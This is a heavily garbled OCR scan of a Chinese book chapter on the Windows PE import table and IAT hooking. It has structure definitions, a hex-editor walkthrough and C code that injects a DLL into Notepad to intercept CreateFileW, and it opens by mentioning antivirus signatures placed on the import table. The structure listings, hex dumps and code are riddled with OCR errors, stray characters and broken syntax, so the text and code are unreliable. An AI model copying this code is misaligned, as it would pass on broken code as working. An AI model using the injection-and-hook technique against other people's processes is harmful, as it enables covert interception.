导入 表 …… 这 些 操作 都 是 杀毒 软件 将 特征 码 定位 到 了 导入 表 上 才 需 要 这 样 做 不 过 可 以 看 出 ， 
导入 表 也 同样 受到 杀毒 软件 的 “关注 ”。 

既然 导入 表 这 么 重要 ， 下 面 先 来 介绍 关于 导入 表 的 知识 。 


7.3.2 导入 表 的 数据 结构 定义 


在 数据 目录 中 定位 第 二 个 目录 ， 即 IMAGE_DIRECTORY_ENTRY IMPORT。 该 结构 体 
中 保存 了 导入 函数 的 RVA 地 址 ， 通 过 该 RVA 地 址 可 以 定位 到 导入 表 的 具体 位 置 。 描 述 导 入 
表 的 结构 体 是 IMAGE _ IMPORT _DESCRIPTOR， 被 导入 的 每 个 DLL 都 对 应 一 个 IMAGE IMP 
ORT_DESCRIPTOR 结构 。 也 就 是 说 ， 导 入 的 DLL 文件 与 IMAGE IMPORT DESCRIPTOR 
是 一 对 一 的 关系 。IMAGE IMPORT _DESCRIPTOR 在 文件 中 是 一 个 数组 , 但 是 导入 信息 中 并 
没有 明确 地 指出 导入 表 的 个 数 ， 而 是 以 一 个 导入 表 中 全 “0” 的 IMAGE IMPORT _DESC 
RIPTOR 为 结束 的 。 导 入 表 对 应 的 结构 体 定义 如 下 : 


typedef struct IMAGE IMPORT DESCRIPTOR { 
union { 
DWORD Characteristics; 
DWORD OriginalnirstThunk: 
Fy 
DWORD TimeDateStamp; 
DWORD ForwarderChain; 
DWORD Name? 
DWORD FirstTrhunk; 
} .IMAGE, IMPORT. DESCRIPTOR:; 


导入 表 中 只 有 这 5 个 成 员 ， 而 其 中 重要 的 只 有 3 个 。 分 别 介绍 该 结构 体 中 每 个 成 员 的 含 
义 ， 具 体 如 下 。 

OriginalFirstThunk: 该 字段 指向 导入 名 称 表 〈 导 入 名 称 表 INT) 的 RVA， 该 RVA 指向 的 
是 一 个 IMAGE THUNK DATA 的 结构 体 。 

TimeDataStamp: 该 字段 可 以 被 忽略 ， 一 般 为 0 即 可 。 

ForwarderChain: 该 字段 一 般 为 0。 

Name: 该 字段 为 指向 DLL 名 称 的 RVA 地 址 。 

FirstThunk: 该 字段 包含 导入 地 址 表 (导入 地 址 表 IAT) 的 RVA，IAT 是 一 个 IMAGE 
THUNK_DATA 的 结构 体 数 组 。 
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在 上 面 介 绍 的 各 个 字段 中 ，TimeDataStamp 和 ForwarderChain 是 不 经 常 使 用 的 ， 一 般 不 
考虑 这 两 个 字段 。 其 余 的 3 个 字段 非常 重要 ， 在 写 加 壳 软 件 或 进行 脱 壳 时 ， 一 般 都 会 涉及 。 

上 面 的 INT 和 IAT 都 会 指向 一 个 IMAGE _ THUNK DATA 结构 体 ， 该 结构 体 的 定义 
如 下 : 


typedef struct .IMAGE THUNK, DATA32 { 
ridorr nt 
DWORD ForwarderSstring; 
DWORD Function; 
DWORD Ordinal; 
DWORD AddressOfData; 
a 
} IMAGE THUNK DATA32; 


该 结构 体 的 成 员 是 一 个 联合 体 ， 虽 然 联 合体 中 有 若干 个 变量 ,但 由 于 该 结构 体 中 包含 的 
是 一 个 联合 体 ， 那 么 这 个 结构 体 也 就 相当 于 只 有 一 个 成 员 变 量 ， 只 是 有 时 代表 的 意义 不 同 。 
看 其 本 质 ， 该 结构 体 实际 上 是 一 个 DWORD 类 型 。 

每 一 个 IMAGE THUNK DATA 对 应 一 个 DLL 中 的 导入 函数 。IMAGE_ THUNK _DATA 
与 IMAGE IMPORT_DESCRIPTOR 类 似 ， 同 样 是 以 一 个 全 “0” 的 IMAGE_THUNK_DATA 

当 IMAGE_THUNK_DATA 值 的 最 高 位 为 1 时 , 表示 函数 以 序号 方式 导入 ,这 时 低 31 位 
被 看 作 一 个 导入 序号 。 当 其 最 高 位 为 0 时 ， 表 示 函 数 以 函数 名 字符 串 的 方式 导入 ， 这 时 


DWORD 的 值 表示 一 个 RVA， 并 指向 一 个 IMAGE IMPORT BY _ NAME 结构 。 
IMAGE LIMPORT BY_NAME 结构 体 的 定义 如 下 : 
typedef struct _IMAGE IMPORT BY NAME { 
WORD Hint; 
了 区 下 直 Name [1]; 
} IMAGE IMPORT BY_ NAME, *PIMAGE IMPORT BY NAME; 


该 结构 体 的 成 员 变 量 含义 如 下 。 

Hint: 该 字段 表示 该 函数 在 其 所 属 DLL 中 的 导出 表 中 的 序号 。 该 值 并 不 是 必需 的 ， 一 些 
连接 器 为 此 值 给 0。 

Name: 该 字段 表示 导入 函数 的 函数 名 。 导 入 函数 是 一 个 以 ASCII 编码 的 字符 串 ， 并 以 
NULL 结尾 。 在 IMAGE IMPORT BY _ NAME 中 使 用 Name[1] 来 定义 该 字段 ， 表 示 这 是 只 有 
1 个 长 度 大 小 的 字符 串 ， 但 是 函数 名 不 可 能 只 有 1 字 节 的 长 度 。 其 实 这 是 一 种 编程 的 技巧 ， 
通过 越界 访问 来 达到 访问 变 长 字符 串 的 功能 。 

IMAGE IMPORT_DESCRIPTOR 结构 体 中 的 OriginalFirstThunk 和 FirstThunk 都 指向 了 
IMAGE_THUNK_DATA 结构 体 ， 但 是 两 者 是 有 区 别 的 。 当 文件 在 磁盘 上 时 ， 两 者 指向 的 
IMAGE_ THUNK DATA 结构 体 是 相同 的 内 容 ， 而 当 文 件 被 装 入 内 存 后 ， 两 者 指向 的 就 是 不 
同 的 IMAGE THUNK DATA 了 。 

在 磁盘 上 时 ，OriginalFirstThunk 指向 的 IMAGE THUNK DATA 中 保存 的 是 指向 函数 名 
的 RVA， 因 此 称 其 为 INT。FirstThunk 通常 指向 的 IMAGE_THUNK_DATA 中 保存 的 也 是 指 
向 函数 名 的 RVA。 它 们 在 磁盘 上 是 没有 差别 的 。 

当 文 件 被 加 载 入 内 存 后 ，OriginalFirstThunk 指向 的 IMAGE_THUNK_DATA 中 保存 的 仍 
然 是 指向 函数 的 RVA， 而 FirstThunk 指向 的 IMAGE_THUNK_DATA 中 则 变 成 了 由 装载 器 填 
充 的 导入 函数 的 地 址 ， 即 IAT。 
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7.3.3 手动 分 析 导 入 表 


在 学 习 PE 文件 结构 时 借助 了 十 六 进 制 编辑 器 ， 现 在 仍然 通过 十 六 进 制 编辑 器 来 学 习 PE 
文件 结构 中 的 重要 结构 体 , 即 导入 表 的 结构 体 IMAGE IMPORT _DESCRIPTOR 。 这 里 随便 找 
个 PE〈EXE 文件 格式 ) 文件 来 进行 分 析 。 

用 C32Asm 打开 要 进行 分 析 的 PE 文件 ， 首 先 定位 到 数据 目录 的 第 二 项 (如 果 读 者 已 经 
忘记 数据 目录 的 定位 方法 ， 请 参考 前 面 的 章节 )， 如 图 7-17 所 示 。 








88888138:| 88 99 18 88 88 18 68 88 98 88 18 88 99 19 99 69 
88688148:| 68 88 88 988 18 88 99 88 99 88 608 88 99 686 89 68 
88815 08: EE ET 68 88 96 86 68 68 68 
6906660166: 66 00 80588985 50 0 90 06 08 00 99 66 68 98 

-| an an na nan ne na an GG an Ga ag Ga An An An 0 


图 7-17 IMAGE IMPORT _DESCRIPTOR 的 RVA 及 大 小 











在 图 7-17 中 看 到 了 数据 目录 中 的 第 三 项 内 容 ， 其 值 分 别 是 0x00004404 和 0x0000003C。 
0x00004404 的 值 表示 IMAGE IMPORT DESCRIPTOR 的 RVA， 注 意 这 里 给 出 的 是 RVA。 现 
在 使 用 十 六 进 制 编辑 器 打开 的 是 磁盘 文件 ， 那 么 就 要 通过 RVA 转换 为 FileOffset， 也 就 是 从 
相对 虚拟 地 址 转换 为 文件 偏 移 地 址 。 使 用 LordPE 来 进行 转换 ， 如 图 7-18 所 示 。 

从 图 7-18 中 可 以 看 出 ，0x00004404 这 个 RVA 对 应 的 FileOffset 为 0x00004404( 从 这 里 
可 以 看 出 ，IMAEG _OPTIONAL HEADER 中 的 SectionAlignment 和 FileAlignment 的 值 是 相 
同 的 )。 那 么 在 C32Asm 中 转移 到 0x00004404 的 位 置 处 ， 按 下 Ctrl + G 组 合 键 ， 在 弹出 的 对 
话 框 中 填 入 “4404” 如 图 7-19 所 示 。 
























|[ 现 定 (0 





LT ea Se ae ra 相对 于 . . 民 
ee el 
Section [站 | 广 现在 位 置 





| Byes ”| 和 条 而 而 闻 而 而 而 而 


个 现在 位 置 往 上 


| LHerEth | 六 文件 结尾 (@) 





图 7-18 计算 IMAGE _ IMPORT DESCRIPTOR 的 FileOffset 图 7-19 C32Asm 中 的 “ 跳 转 到 ” 


单 击 “ 确 定 ” 按 钮 ， 来 到 文件 偏 移 为 0x00004404 的 位 置 处 ， 如 图 7-20 所 示 。 


:|29 3C 30 899 2D 3C 8#9 BO FF FF FF FF AD 3D #9 96 
:| B1 3D 49 806 世道 二天 必 惠 怀表 由 天 天 天 二 天 光大 二 大 二 天 天 
SC 45 90 686 90 HD 60 90 ED 44 699 88 069 08 99 有 
Ba 60 09 69 68 35 99 6 AG 5 99 99 99 608 860 全 
S89 BB 699 886 88 88 88 89 88 88 68 68 $8 86 99 98 





:| ES 34 99 00 FE Hu O09 09 12 35 99 899 26 8385 99 99 


图 7-20 导入 表 位 置 





来 到 文件 偏 移 的 0x00004404 处 就 是 IMAGE IMPORT DESCRIPTOR 的 开始 位 置 。 从 
图 7-20 中 可 以 看 出 ， 该 文件 有 两 个 IMAGE IMPORT DESCRIPTOR 结构 体 。 按 照 数 据 目 
录 的 长 度 0x3C 来 进行 计算 ， 应 该 有 3 个 IMAGE IMPORT DESCRIPTOR 结构 体 , 但 是 第 三 
个 IMAGE IMPORT _ DESCRIPTOR 结构 体 是 一 个 全 “0” 结 构 体 。 这 两 个 结构 体 的 对 应 关系 





名 
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如 图 7-21 所 示 。 


IMAGE_IMPORT_DESCRIPTOR 数 据 整理 


OriginalFirstThunk TimeDateStamp ForwarderChain FirstThunk 





0000 4440 0000 0000 0000 0000 0000 454C 0000 4000 
0000 44E0 0000 0000 0000 0000 0000 4568 0000 A040 


图 7-21 IMAGE IMPORT_DESCRIPTOR 数据 整理 表 一 


前 面 已 经 提 到 , 对 于 IMAGE_IMPORT_DESCRIPTOR 结构 体 , 只 关心 OriginalFirstThunk、 
Name 和 FirstThunk 3 个 字段 ， 其 余 并 不 关心 。 首 先 来 看 一 下 Name 字段 的 数据 。 在 图 7-21 
中 ， 两 个 Name 字段 的 值 分 别 是 0x0000454C 和 0x00004568， 这 两 个 值 同样 是 RVA。 直 接 在 
C32Asm 中 查看 这 两 个 偏 移 地 址 处 的 内 容 ， 分 别 如 图 7-22 和 图 7-23 所 示 。 


J 


:| 75 6C 65 H8 61 6E 64 6C 65 81 88 88 SBA 








TacIT ro 


uleHandlef. [ET 


:| CLIC A; 98 DF 61 53D 65 73 73 (am. .Mess 
:6 ! 8 6 ageBoxB E 1 


图 7-22 0x0000454C 处 的 内 容 为 “KERNEL32.d11” 





:| 35 HC 33 32 2E 64 6C 6C 99 88 DF 81 3D 65 73 73 | EL32.d11..?Mess’ 
:| 61 67 65 42 6F 78 11 69 BREEN NEERERINY | ayeBoxn (NTEZR 
B88 18 61 47 65 74 43 6F 6D 6D 61 6E 64 | WW...GetConnand 
HC 69 6E 65 41 98 E8 891 47 65 74 56 65 72 73 69 | Linef.?GetUersit 








图 7-23 0x00004568 处 的 内 容 为 “USER32.dl1” 


重新 对 图 7-21 所 示 的 数据 表格 进行 整理 ， 如 图 7-24 所 示 。 


IMAGE _IMPORT_DESCRIPTOR 数 据 整 理 
IE 


图 7-24 IMAGE IMPORT _DESCRIPTOR 数据 整理 表 二 





接着 来 分 析 OriginalFirstThunk 和 FirstThunk 两 个 字段 的 内 容 , 这 两 个 字段 的 内 容 都 保存 
了 一 个 IMAGE THUNK DATA 数组 起 始 的 RVA 地 址 。 看 一 下 第 一 条 IMAGE IMPORT 
DESCRIPTOR 结构 体 中 的 OriginalFirstThunk 和 FirstThunk 的 数据 内 容 。 在 C32Asm 中 查看 
0x00004440 和 0x00004000 处 的 内 容 ， 如 图 7-25 和 图 7-26 所 示 。 





:| 99 88 80 88 68 45 88 88 A 48 88 96 69 69 86 





B8983FF9:| 89 860 69 68 08 69 99 59 48 $0 86 

88084880- 8 2 45 80 26 :5 G9 
9000646198: ] 9 0 98 71 88 日 
B8884828- 5 ! 39 A2 [ B89 8 
88988838: ES 88 日 
Be994689: 8 8 89 6 


8004958: 9 80 6 8 C 68 6 
.| 9 ES 69 88 


8 8 
37 G8 
B80 全 7 688 a9 B89 有 
86698689:- 96 99 96 96 99 FF FF FF FF 


图 7-25 _ OriginalFirstThunk 数据 的 内 容 图 7-26 FirstThunk 数据 的 内 容 




















从 图 7-25 和 图 7-26 中 可 以 看 出 ， 在 磁盘 文件 中 ，OriginalFirstThunk 和 FirstThunk 字段 中 
RVA 指向 的 DWORD 类 型 数组 是 相同 的 。 在 枚 举 导入 函数 时 ， 通 常会 读 取 OriginalFirstThunk 
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字段 的 RVA 来 找到 导入 函数 。 但 是 有 些 情况 下 ，OriginalFirstThunk 的 值 为 0， 这 时 需要 通过 
读 取 FirstThunk 的 值得 到 导入 函数 的 RVA。 

在 图 7-25 中 ，0x00004440 地 址 处 的 DWORD 值 为 0x000044E8， 该 值 指向 IMAGE 
IMPORT _ BY NAME 结构 体 。 在 C32Asm 中 查看 0x000044E8 的 值 ， 如 图 7-27 所 示 。 


880844D8: 5C 47 88 8689 72 #7 69 68 A 88 66 be 和 人 66 
















73 73 2 79 8 ri 
888845 898: 52 65 61 64 58 72 6F 63 65 73 73 MD 65 6D 6F 72 






Fear 





图 7-27 0x000044E8 处 IMAGE IMPORT BY NAME 结构 体内 容 


回忆 一 下 IMAGE IMPORT BY NAME 结构 体 的 定义 ， 具 体 如 下 : 
typedef struct _IMAGE IMPORT BY NAME 1 

WORD Hint; 

BYTE Name[1]; 
} IMAGE IMPORT BY NAME, *PIMAGE TIMPORT!, BY NAME; 


对 照 其 定义 结构 可 以 看 出 ，IMAGE IMPORT BY_NAME 的 前 两 个 字 节 Hint 表示 序号 ， 
在 图 7-27 中 , 该 值 为 0x03AD; Name 表示 导入 函数 的 名 称 , 在 图 7-27 中 , 该 值 为 WriteProcess 
Memory。 

由 于 该 kernel32.dll 导入 的 函数 较 多 ， 关 于 导入 函数 ， 请 读者 自行 整理 到 表格 中 进行 观察 。 

在 磁盘 文件 中 ，OriginalFirstThunk 和 FirstThunk 字段 指向 的 内 容 相 同 ， 但 当 文 件 被 载 入 
内 存 后 ，OriginalFirstThunk 仍然 指向 导入 函数 的 名 称 表 ， 而 FirstThunk 字段 指向 的 内 容 会 变 
为 导入 函数 的 地 址 。 将 该 程序 载 入 OD 中 ， 然 后 直接 分 析 其 FirstThunk 指向 的 内 容 。 

在 前 面 的 分 析 中 知道 ，kernel32.dll 文件 的 FirstThunk 的 RVA 为 0x00004000。 将 其 转换 
为 VA, 其 VA 地 址 为 0x00404000。 在 OD 的 数据 窗口 中 直接 查看 0x00404000 地 址 处 的 内 容 ， 
如 图 7-28 所 示 。 

从 图 7-28 中 可 以 看 出 ,FirstThunk 指向 RVA 的 数据 已 经 发 生 了 变化 ,这 些 值 即 为 导入 函 
数 的 地 址 表 。 在 数据 窗口 单 击 右键 ， 在 弹出 的 菜单 中 选择 “长 型 -> 地 址 ” 再 次 观察 FirstThunk 
的 内 容 ， 如 图 7-29 所 示 。 


OONBABON| 7C8921D0 Kernel32 Re 
BBuBkteS | 7588DE95 | kernel132.BetCurrentProcess 
9NB590C | 7C8OAE4S KerneI32.GetProchddress 
7589B781 kernel32.6etHoduleHandlef 
|7C838A14 kernel32-SetStringTypen 
kerne132.LCMapStringW 
kernel132.6etCommandl inef 
7C811752 | kernel32-GetUersion 

| 7C81D2898 | kernel32 .ExitProcess 
7C938477 ntdll .RtlRefAllocateHeap 
7C9388C4 ntdl1.RtlAllocateHeap 
7C881E1A| kerne132.TerminateProcess 
7C9384DD | ntd11 .RE1SizeHeap 

7E864842| kerne132.UnhandledExceptionFilter 
7C80B856F kernel32.GetModuleFileNamef 


7C81DDE7 kerne132. FreeEnvironmentStringsA 
ota 和 人 











图 7-28 FirstThunk 在 内 存 中 的 数据 图 7-29 FirstThunk 指向 的 值 即 为 导入 函数 地 址 表 


从 图 7-29 中 可 以 清楚 地 看 出 ，First Thunk 指向 的 RVA 处 的 内 容 是 导入 函数 的 地 址 表 。 
地 址 0x00404000 处 保存 的 是 0x7C802213， 即 为 WriteProcessMemory 函数 的 入 口 地 址 。 在 
OD 中 的 反 汇 编 窗口 中 ， 通 过 Ctrl+G 快捷 键 来 到 0x7C802213 地 址 处 ， 如 图 7-30 所 示 。 

本 部 分 详细 分 析 了 导入 表 在 磁盘 文件 和 内 存 中 的 存在 形式 与 FirstThunk 的 数据 差异 。 导 
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入 表 在 PE 文件 结构 中 是 至 关 重 要 的 一 个 结构 体 ， 希望 本 节 对 导入 表 的 详细 讲解 能 使 读者 熟 
练 掌握 导入 表 的 相关 知识 。 








+ esp 


,A 
x ,HOF ebp 


p 
8B35 C412897C | mov i, dword ptr [<entdll.NtProte 
57 | push 
| 887D 88 MoU 
:8945 F8 mov 








图 7-30 0x7C802213 即 为 WriteProcessMemory 函数 入 口 地 址 


7.3.4 ”编程 枚 举 导 入 地 址 表 


从 上 面 的 分 析 过 程 中 已 经 学 习 了 IMAGE IMPORT DESCRIPTOR 结构 体 。 那 么 ， 下 面 就 用 
代码 实现 枚 举 导 入 地 址 表 的 内 容 。 一 个 DLL 文件 对 应 一 个 IMAGE IMPORT _DESCRIPTOR 结 
构 ， 而 一 个 DLL 文件 中 有 多 个 函数 ， 那 么 需要 使 用 两 个 循环 来 进行 枚 举 。 外 层 循环 枚 举 所 有 
的 DLL， 而 内 层 循 环 枚 举 所 导入 的 该 DLL 的 所 有 函数 名 及 函数 地 址 。 

关键 代码 如 下 : 


PIMAGE IMPORT DESCRIPTOR pImpDes= (PIMAGE IMPORT DESCRIPTOR) ImageDirectoryEn tryToDa 
ta (lpBase, TRUE, IMAGE DIRECTORY_ ENTRY IMPORT, &dwNum); 


PIMAGE, IMPORT DESCRIPTOR pTmpImpDes = pImpDes; 
While ( plmpImpDes->Name ) 


{ 


} 


printf("DIlName = %s \r\n", (DWORD)1lpBase + (DWORD)pTMmpIimpDes->Name); 
PIMAGE_THUNK_ DATAthunk= (PIMAGE THUNK DATA) (pTmpImpDes->FirstThunk+ (DWORD) 
lpBase)? 


4nE n= 0 
while '( thank" Duli Fametiorn, ) 
{ 
if ( thunk->ul.Ordinal & IMAGE ORDINAL, FLAG ) 
下 
mentf("OrAdlrnal ss 0 Nn thunk utiOrdinal ec, DxEnEpy) 风 
} 
else 
{ 
PIMAGE IMPORT BY NAME plImName= (PIMAGE IMPORT BY NAME)thunk->ul.Functi on; 
printf ("EuncName = $s \t \t", (DWORD)lpBase + plimName->Name); 
DWORD dwAddr = (DWORD) ((DWORD *) ( (DWORD)PNtHdr->QptionalHeader.ImageBase 
+ pTmpImpDes->FirstThunk) + n); ， 
printf( adds 二 DB TawAaGE) ， 


thanr Tt? 
到 于 未 让 大 
} 


pTmpImpDes ++; 


只 要 读者 对 手动 分 析 导 入 表 能 够 理解 的 话 ， 那 么 上 面 这 段 代 码 就 不 难 理解 了 。 对 某 个 程 
序 进行 测试 ， 看 其 输出 结果 ， 如 图 7-31 所 示 。 

用 OD 验证 ， 对 该 测试 程序 的 导入 表 信 息 的 获取 是 否 正确 。 用 OD 载 入 测试 程序 ， 然 后 
在 数据 窗口 中 按 下 Ctrl + G 组 合 键 ， 输 入 地 址 “424190”， 然 后 在 数据 窗口 上 单 击 鼠 标 右键 ， 
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在 弹出 的 菜单 中 选择 “长 型 ”一 “地 址 ”命令 ， 看 数据 窗口 的 内 容 ， 如 图 7-32 所 示 。 


窗 


DllName = 
FuncName = C 3 E * = B6424198 
EUG I 
42 


二 8842 41h@ 











= 80804241tpb4 
a = B04241b8 
addr = G8064241bc | 
图 7-31 测试 程序 的 导入 信息 表 图 7-32 测试 程序 在 OD 中 的 导入 表 信 息 
那么 说 明 程 序 是 正确 的 。 关 于 导入 表 的 知识 就 介绍 到 这 里 。 接 下 来 介绍 如 何 对 IAT 进行 
HOOK 的 内 容 ， 请 读者 务必 掌握 本 节 的 内 容 。 





7.3.5 _ IAT HOOK 介绍 


在 前 面 的 内 容 中 提 到 ‘tghe de IMAGE IMPORT DESCRIPTOR 中 有 两 个 IMA 

GE_THUNK_DATA 结构 体 ， 第 一 个 为 导入 名 字 表 (INT)， 第 二 个 为 导入 地 址 表 (IAT)。 两 
个 结构 体 在 磁盘 文件 ee 的 , 但 是 当 PE 文件 被 装载 内 存 后 ，FirstThunk 字段 指向 
的 IMAGE THUNK DATA 的 值 会 被 Windows 进行 填充 。 该 值 为 一 个 RVA， 该 RVA 加 上 映 
像 基 址 后 ， 虚 拟 地 址 就 保存 了 真正 的 导入 函数 的 入 口 地 址 。 
在 这 个 描述 中 知道 ， 要 对 IAT 进行 HOOK 大 概 有 3 个 步骤 ， 第 一 步 是 获得 要 HOOK 函 
数 的 地 址 ， 第 二 步 是 找到 该 函数 所 保存 的 IAT 中 的 地 址 ， 最 后 一 步 是 把 IAT 中 的 地 址 修改 为 
HOOK 函数 的 地 址 。 这 样 就 完成 了 IAT HOOK。 也 许 这 样 的 描述 不 是 很 清楚 ， 下 面 就 来 举例 
说 明 。 

比如 要 在 IAT 中 HOOK 系统 模块 kernel32.dll 中 的 ReadFile() 函 数 ， 第 一 步 是 获得 ReadFile() 
函数 的 地 址 ， 第 二 步 是 找到 ReadFile() 所 保存 的 IAT 地 址 ， 最 后 一 步 是 把 IAT 中 的 ReadFile() 
函数 的 地 址 修改 为 HOOK 函数 的 地 址 。 这 样 是 不 是 就 明白 了 ? 下 面 通过 一 个 实例 来 介绍 IAT 
HOOK 的 具体 过 程 和 步骤 。 


7.3.6 ”IAT HOOK 实例 


上 次 对 Explorer.exe 进程 的 CreateProcessW() 函 数 进 行 了 Inline Hook， 这 次 对 记事 本 进程 
的 CreateFileW0O 函 数 进行 IAT HOOK。 对 CreateFileW0O 函 数 进行 HOOK 后 主要 是 管控 记事 本 
要 打开 的 文件 是 否 人 允许 被 打开 ， 下 面 一 步 一 步 地 来 完成 代码 。 

先 建立 一 个 DLL 文件 ， 然 后 定义 好 DLL 文件 的 主 函 数 ， 并 定义 一 个 HookNotePad 
ProcessIAT(O 函 数 , 在 DLL 被 进程 加 载 的 时 候 ， 让 DLL 文件 去 调用 HookNotePadProcessIAT() 
函数 。 代 码 如 下 : 


BOOL APIENTRY DllMain( HANDLE hModule, 
DWORD ul reason for call, 
LPVOTID JpReserved 
) 
























































switch ( ul reason for call ) 
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case DLL PROCESS ATTACH: 


// 在 DLL 被 加 载 时 调用 HookNotePadProcessIAT () 第 
HookNotePadProcessIAT{(); 
break; 
} 章 
} 
return TRUE;? 黑 
| 客 
遍历 某 程序 的 导入 表 时 是 通过 文件 映射 来 完成 的 , 但 是 当 一 个 可 执行 文件 已 经 被 Windows 插 
装载 器 装载 入 内 存 后 ， 便 可 以 省 去 CreateFile()、CreateFileMapping() 等 诸多 繁琐 的 步骤 ， 取 的 
而 代 之 的 是 通过 简单 的 GetModuleHandle() 函 数 就 可 以 得 到 EXE 文件 的 模块 映像 地 址 ， 并 能 5 
够 很 容易 地 获取 DLL 文件 导入 表 的 虚拟 地 址 。 代 码 如 下 : 去 
7 获得 Createfile 技 
HMODULE hMod = LoadLibrary ("kernel32.d1l1"); 术 
DWORD dwFuncAddr = (DWORD)GetProcAddress (hMod, "CreateFileW"); 
CloseHandle (hMod):; 
// 获取 记事 本 进程 模块 基 址 ui 


HMODULE hModule = GetModuleHandleA (NULL); 


// 定位 PE 结构 
PIMAGE DOS HEADER pDosHdr = (PIMAGE DOS HEADER)hModule; 
PIMAGE NT HEADERSPNtHAr = (PIMAGE NT HEADERS) ( (DWORD)hModule + pDosHdr->e lfanew); 


// 保存 映像 基 址 及 导入 表 的 RVA 


DWORD dwImageBase = pNtHdr->OptionalHeader.JlmageBase; 
DWORDdwImpRva=pNtHdr->OptionalHeader.DataDirectory[IMAGE DIRECTORY ENTRY IMPO 
RT] .VirtualAddress; 


// 导入 表 的 Va 
PIMAGE IMPORT DESCRIPTOR plimgDes = (PIMAGE IMPORT DESCRIPTOR) (GwImageBase + 
GwImPRva) 


在 获得 导入 表 的 位 置 以 后 ， 要 在 导入 表 中 找寻 要 HOOK 函数 的 模块 名 ， 也 就 是 说 ， 要 对 
CreateFileW() 函 数 进行 HOOK， 首 先 要 找到 该 进程 中 是 否 有 “kernel32.dll” 模 块 。 一 般 情况 
下 ，kemel32.dll 模块 一 定 会 存在 于 进程 的 地 址 空间 内 ， 因 为 它 是 Win32 子 系统 的 基本 模块 。 
当然 ， 并 不 是 简单 地 要 找到 该 模块 是 否 存 在 ， 关 键 是 要 找到 这 个 模块 所 对 应 的 IMAGE IMP 
ORT_DESCRIPTOR 结构 体 ， 这 样 才能 通过 kernel32.dll 所 对 应 的 IMAGE THUNK DATA 结 
构 体 去 查找 保存 CreateFileW0O 函 数 的 地 址 ， 并 进行 修改 。 代 码 如 下 : 


char szaddr[10] = { 0 }; 


PIMAGE IMPORT DESCRIPTOR PTmPImPDes = plImgDes; 
BOOL bFoungd = FALSE; 


// 查找 欲 BOOK 函数 的 模块 名 

While ( BDImpImpDes->Name ) 

{ 
DWORD dwNameAddr = dwlimageBase + pTmpImpDes->Name; 
char szName [MAXBYTE] = { 0 }; 
strcpy (szName, (char*)dwNameAddr); 


if ( strcmp (strlwr(szName), "kernel32.d11") == 0 ) 
{ 
bFound = TRUE; 
break; 
} 
PTmPImPDes ++} 
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// 判断 是 否 找到 欲 HOOK 国 榴 和 村 的 明和 吉 
if ( bFound == TRUE 


{ 
bFound = FALSE; 
音 char sg%Adqc tO = { 017 
// 逐个 遍历 该 模块 的 IAT 地 址 
黑 PIMAGE THUNK DATA pThunk = (PIMAGE THUNK DATA) (pTmplImpDes->FirstThunk + QwImage 
客 Base); 
局 
手 While ( pThunk->ul.Function ) 
人 n 

的 DWORD *pAddr = (DWORD *)& (pThunk->ul,.Function); 
5 // 比较 是 否 与 欲 HOOK 函数 的 地 址 相同 
OO if ( *pAddr == dwFuncAddr ) 
入 { 
技 bFound = TRUE; 
术 dwCreateFileWAddr = (CREATEFILEW) *pAddr; 

DWORD dwMyHookAddr = (DWORD)MyCreateFileWy; 

// 修改 为 HOOK 函数 的 地 址 

WriteProcessMemory (GetCurrentProcess(), (LPVOID)PpAddr, &dwMyHookAddr, 

NR sizeof (DWORD), NULL); 
break; 
} 
pThunk ++» 


} 


rp WO OR, HI Wi ne. 由 于 这 是 演示 
程序 ， 那 么 笔者 在 D 盘 下 建立 一 个 test.txt 文件 ， 然 后 对 其 进行 管控 。 也 就 是 说 ， 如 果 用 记事 
| 本 打开 这 个 程序 的 话 ， 可 以 选择 性 地 允许 打开 ， 或 者 不 允许 打开 。 代 码 如 下 : 


HANDLE 

WINAPI 

MyCreateFileW!( 
LPCWSTR lpFileName,;, 
DWORD dwDesiredAccess, 
DWORD dwShareMode, 
LPSECURITY ATTRIBUTES lpSecurityAttributes, 
DWORD dwCreationDisposition, 
DWORD dwFlagsAndAttributes, 
HANDLE hTemplateFile 

) 


WCHAR wFileName[MAX PATH] = { 0 }; 
wcscpy (wFileName, lpFileName); 
if ( wcscmp (wcslwr (wFileName), L"d:\\test.txt") == 0 ) 
{ 
if ( MessageBox (NULL， "是 否 打开 文件 "， "提示"，,，MB YESNO) == IDYES ) 
{ 
return dwCreateFileWAddr (1pFileName, 
dwDesiredAccess, 
dwShareMode, 
lpSecurityAttributes, 
dwCreationDisposition;, 
dwFlagsAndAttributes, 
hTemplateFile); 
} 
else 
{ 
return INVALID HANDLE VALUE; 
:i 
} 
else 
{ 
return dwCreateFileWAddr (lpFileName, 
dwDesiredAccess, 
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dwShareMode, 

lpsSecurityAttributes, 

dwCreationDisposition, 

dwFlagsAndAttributes, 
: hrTemplateFile); 

} 

这 里 HOOK 的 函数 是 CreateFileW()。 通 过 函数 中 的 W 可 以 看 出 ， 这 个 函数 是 一 个 
UNICODE 版 本 的 字符 串 ， 也 就 是 宽 字 符 串 。 在 CreateFileW0 函 数 的 参数 中 ，lpFileName 的 
类 型 是 一 个 指向 宽 字符 的 指针 变量 。 那 么 ， 就 需要 在 操作 该 字符 串 时 使 用 宽 字 符 集 的 字符 串 
函数 ， 而 不 应 该 再 使 用 操作 ANSI 字符 串 的 函数 。 在 代码 中 ，wesepy()、wcescmp()、weslwr() 
都 是 针对 宽 字 符 集 的 字符 串 。 WCHAR 是 定义 宽 字 符 集 类 型 的 关键 字 。L"d:Ntesttxt" 中 的 “ 工 ” 
表示 这 个 字符 串 常量 是 一 个 宽 字 符 型 的 。 

打开 一 个 记事 本 程序 ， 然 后 将 编译 连接 好 的 DLL 文件 注入 记事 本 进程 中 。 当 注入 并 
HOOK 成 功 后 ， 会 用 对 话 框 提示 “Hook Successfully !”。 然 后 用 记事 本 打开 D 盘 下 的 testtxt 
文件 ， 会 弹出 对 话 框 询 问 “ 是 否 打 开 文 件 ”， 单 击 “ 否 ”按钮 ， 也 就 是 拒绝 打开 该 文件 ， 如 
图 7-33 和 图 7-34 所 示 。 

在 图 7-34 中 ， 单 击 “ 确 定 ”按钮 ， 可 以 看 到 记事 本 并 没有 打开 D 盘 下 的 test.txt 文件 。 i 
明 对 D 盘 下 的 test.txt 文件 的 管控 算是 成 功 〈 这 个 程序 并 不 完善 ， 希 望 读者 可 以 自行 将 其 完 

以 上 实例 演示 了 如 何 对 IAT 进行 HOOK。 不 过 上 面 针对 IAT 进行 HOOK We 
对 隐 型 调用 。 也 就 是 说 ， 可 执行 文件 是 直接 调用 了 DLL 的 导出 函数 ， 用 上 面 的 代码 可 以 对 
